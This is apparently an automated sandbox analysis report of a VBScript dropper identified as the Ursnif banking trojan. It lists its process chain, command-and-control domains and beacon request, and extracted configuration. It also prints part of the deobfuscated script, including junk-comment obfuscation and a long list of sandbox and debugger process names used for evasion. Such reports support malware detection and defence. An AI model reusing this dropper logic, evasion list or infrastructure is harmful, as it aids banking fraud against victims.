Loading ...

Play interactive tourEdit tour

Analysis Report news#_29621.vbs

Overview

General Information

Sample Name:news#_29621.vbs
MD5:22f41f6a07960e8a8c51009f1ef1a845
SHA1:0368db6cdf586dcbd87f00d2704cc14ee19124b9
SHA256:dc673aa6fd93c29a7539571cd3425cde4a2965da40f778c6e5f29cac49045ecf

Most interesting Screenshot:

Errors
  • Sigma syntax error: One detector has no map or list, Rule: Suspicious XOR Encoded PowerShell Command Line
  • Sigma syntax error: One detector has no map or list, Rule: Suspicious PowerShell Parent Process

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5512 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5668 cmdline: regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\pristine.diff MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5036 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250151", "uptime": "338", "system": "408d339fa6feb5d11ab15c0b00016768", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593541998", "user": "31b341dd54c8a3b79c4b2eb57edb75be", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\pristine.diff , CommandLine: C:\Users\user\AppData\Local\Temp\pristine.diff , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff , ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5668, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\pristine.diff , ProcessId: 5680

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: regsvr32.exe.5680.3.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250151", "uptime": "338", "system": "408d339fa6feb5d11ab15c0b00016768", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593541998", "user": "31b341dd54c8a3b79c4b2eb57edb75be", "hash": "0x00000000", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 10%Perma Link
            Source: 2no.coVirustotal: Detection: 6%Perma Link
            Source: https://2no.co/Virustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: news#_29621.vbsVirustotal: Detection: 28%Perma Link
            Source: news#_29621.vbsReversingLabs: Detection: 25%
            Source: 3.2.regsvr32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B9673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_007B9673
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/oNfDCFjsmK/Rz7c_2F4HvcZGT1UO/hYlOIGMBBBfj/jCyweCeg9Td/V4Jdgz4PeDxybI/DpYXEDmbXgB5dW_2FAye2/oUJclJiKLyLVmwuC/OtQZKsq_2BQfPsi/FHxIVm6eYFq10sCQW9/KcXAQ4JEw/lbIG73IByxcR0zSY26mY/BeLa_2BQ48sYYvIJmwB/Y3nm6BXVPzClvCr30q_2Br/oYa5C1vjCsCmP/JA8WJuye/6b_2Br6_2FhZaIYSLhIPB_2/FpRFgZpVGq/MA0TRM5gw0_0A_0DP/5apJruSBVrXP/hhq63GirVkl/ZaKhgcV_2BlckE/7jtXlG_2F_2FSNj9dtZVK/HEKex5OFh85rp/sO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: 2no.co
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 Jun 2020 09:33:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000003.804138417.0000021590380000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: wscript.exe, 00000000.00000003.800576234.0000021595E61000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.837207713.0000021595ED7000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/
            Source: wscript.exe, 00000000.00000002.852359516.00000215922E8000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.851902509.000002159221A000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.836507336.0000021593B5C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.853821826.0000021593B46000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/1vXQd7
            Source: wscript.exe, 00000000.00000003.837628270.0000021596E60000.00000004.00000001.sdmpString found in binary or memory: https://2no.co/1vXQd7O
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000177C NtMapViewOfSection,3_2_1000177C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100011C7 GetProcAddress,NtCreateSection,memset,3_2_100011C7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002785 NtQueryVirtualMemory,3_2_10002785
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B1884 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_007B1884
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007BB085 NtQueryVirtualMemory,3_2_007BB085
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100025643_2_10002564
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007BAE643_2_007BAE64
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007B1D723_2_007B1D72
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100117003_2_10011700
            Source: news#_29621.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@7/8@2/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: news#_29621.vbsVirustotal: Detection: 28%
            Source: news#_29621.vbsReversingLabs: Detection: 25%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\news#_29621.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Users\user\AppData\Local\Temp\pristine.diff
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\pristine.diff
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\pristine.diff Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4256 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\colony\energy\Difficult\rose\instrument\baby\Laugh.pdb source: wscript.exe, 00000000.00000003.791857071.0000021592207000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1190556934.0000000010013000.00000002.00020000.sdmp, pristine.diff.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")REM lemur chic brokerage Burt. 7956037 flunk tomahawk bastion form cypress. sukiyaki. Jerusalem, Monoceros sequitur slave juxtapose adduce Bismarck orchestral mortify serendipitous. Jarvin forsaken Adirondack emphatic misanthrope sideman argon illegible doorbell allay plus Remington Dim NUEc: Set NUEc = CreateObject("Scripting.FileSystemObject")If (NUEc.FileExists(CT + "microsoft.url")) ThenaEZlCZuWScript.QuitElseWith fiefdom.createShortcut(CT + "adobe.url")' scrotum Emery Sylow Sonora wolf volcano juggernaut pyridine simplectic Wyman, 2338391 nematocyst scoria abode Nehru threadbare rumble levy bluejacket aperiodic riot Enos synopses visitation mangrove .TargetPath = "https://adobe.com".Save()End WithEnd IfEnd FunctionFunction architectonic()on error resume nextIf (InStr(WScript.ScriptName, cStr(252438523)) > 0 And Pv = 0) ThenREM vend roar slave759 Malagasy. susceptance allergy pip partition predicate clank Presbyterian bode gad, slunk113 sesame. Niger Marin Boreas Manitoba nudge southbound insolate astonish colloidal customhouse. gemsbok Clausen. 3848977 ache Deane flirt typographer beggar Barney Exit FunctionEnd If' snip hickory. anybody. tramp streptomycin Boca stony taunt peck cantor, bibliophile Armenia, 6871909 penumbra lingo Kerrproc = (90 + (-((1464 - 8.0) - (1371 - 5.0))))Sinai = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","r
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002500 push ecx; ret 3_2_10002509
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002553 push ecx; ret 3_2_10002563
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007BAE53 push ecx; ret 3_2_007BAE63
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007BAB20 push ecx; ret 3_2_007BAB29

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\pristine.diffJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\pristine.diffJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\news#_29621.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmpBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@7
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
